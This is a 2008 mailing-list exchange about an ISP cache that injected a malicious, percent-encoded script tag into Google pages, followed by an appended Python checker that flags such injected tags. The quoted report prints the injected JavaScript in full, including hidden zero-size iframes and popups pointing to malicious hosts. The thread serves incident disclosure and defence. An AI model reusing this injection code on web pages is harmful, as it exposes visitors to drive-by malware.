[General] FT Cache Compromise Details
kuwait at q8net.com
Thu Dec 4 18:13:43 +03 2008
I did contact them by phone; they gave me an email address, to which I also explained what's going on. By the way, I did the same test and all I got was just "Bad Request" and none of the things you received, like framing and JavaScript.
--- On Thu, 12/4/08, Burhan Khalid <burhan at kuwaitnet.net> wrote:
> From: Burhan Khalid <burhan at kuwaitnet.net>
> Subject: [General] FT Cache Compromise Details
> To: "General OpenSource Discussion" <general at oskw.org>
> Date: Thursday, December 4, 2008, 4:41 PM
> I don't think I need to say this, but do not click on
> any links in this email.
>
> Salaam All:
>
> Just as a reminder, as of this email date, the cache is
> still compromised (see paste below).
>
> [burhan at t61p ~]$ telnet google.com 80
> Trying 72.14.205.100...
> Connected to google.com.
> Escape character is '^]'.
> GET / HTTP/1.1
> Host: www.google.com
>
> HTTP/1.1 200 OK
> Content-Type: text/html; charset=ISO-8859-1
> Set-Cookie:
> PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
> expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/;
> domain=.google.com
>
> <script language=javascript
> src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
> 16e2
>
> Apparently it's loading something from a Chinese website
> (58.53.128.82), a JavaScript file, which does what normal
> such exploits do - loads in iframe content from another
> compromised site, and opens popups:
>
> function Get(){
> var Then = new Date()
> Then.setTime(Then.getTime() + 1*40*60*1000)
> var cookieString = new String(document.cookie)
> var cookieHeader = "cainibi="
> var beginPosition = cookieString.indexOf(cookieHeader)
> if (beginPosition != -1){
> } else
> { document.cookie =
> "cainibi=chongxinzuo;expires="+ Then.toGMTString()
> document.write("<div
> style=\"display:none\">");
> document.write("<iframe src=http://se.c66a.cn/
> width=0 height=0></iframe>");
> window.open("http://liaobamm.com");
>
> }
> }
> document.write("<iframe
> src=http://w.c66d.cn/logo.htm width=100
> height=0></iframe>");
> Get();
>
>
> If anyone has an inside ear on FT, tell them to block
> access at their firewall to the offending IPs. Hell, they
> block Skype, why can't they block something I don't
> want?
>
> Enjoy,
> --
> Burhan Khalid
>
> _______________________________________________
> General mailing list
> General at oskw.org
> http://mail.oskw.org/mailman/listinfo/general_oskw.org
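
A check for the kind of injection shown in the paste above, added here as an example and not part of either message: it scans a response body for script and iframe tags, percent-decodes each source hostname, and reports tags that load from hosts the page is not expected to use. The function name `audit`, the `EXPECTED_HOSTS` allowlist and the stand-in page body are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the script tag and iframe quoted in the message above,
# placed in front of a stand-in page body.
SAMPLE_BODY = (
    "<script language=javascript\n"
    "src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>\n"
    "<iframe src=http://w.c66d.cn/logo.htm width=100 height=0></iframe>\n"
    "<html><body><script src=/js/app.js></script></body></html>"
)
# Assumption: hosts the requested page is expected to load content from.
EXPECTED_HOSTS = {"www.google.com", "google.com"}

TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
ZERO_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0\b""", re.I)


def audit(body, expected_hosts):
    """Return one finding per script/iframe tag that loads from an unexpected host."""
    findings = []
    for match in TAG_RE.finditer(body):
        tag, attrs = match.group(1).lower(), match.group(2)
        src = SRC_RE.search(attrs)
        if not src:
            continue
        # Host exactly as written in the tag, without userinfo or port.
        raw_host = urlsplit(src.group(1)).netloc.rpartition("@")[2].partition(":")[0]
        host = unquote(raw_host).lower()  # percent-decoded form of the host
        if not host or host in expected_hosts:
            continue  # relative URL or an expected origin
        reasons = ["unexpected host"]
        if "%" in raw_host:
            reasons.append("percent-encoded hostname")
        if tag == "iframe" and ZERO_RE.search(attrs):
            reasons.append("zero-size iframe")
        findings.append({"tag": tag, "host": host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_BODY, EXPECTED_HOSTS):
        print(finding)
```

Run against the same URL from a network path that does not pass through the cache, a clean response produces no findings, which helps separate a cache problem from a problem at the origin.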